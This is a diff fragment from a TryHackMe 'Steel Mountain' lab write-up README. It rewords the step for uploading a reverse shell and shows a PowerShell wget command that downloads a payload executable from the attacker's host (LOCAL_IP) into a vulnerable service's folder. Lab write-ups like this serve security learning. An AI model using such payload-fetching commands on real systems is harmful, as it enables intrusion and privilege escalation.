EvanDiamantidis/TryHackMe/Machines/Steel Mountain/README.md

 <br />

-Upload the reverse shell using the `powershell -c wget` command to transfer it from our `python` server which should still be running in the background.
+Upload the reverse shell via the `python` server we used to connect to this machine earlier if it is still running in the background, otherwise set up a temporary one from scratch.

 ```
 C:\Program Files (x86)\IObit\Advanced SystemCare>powershell -c wget "http://LOCAL_IP:80/ASCService.exe" -outfile "ASCService.exe"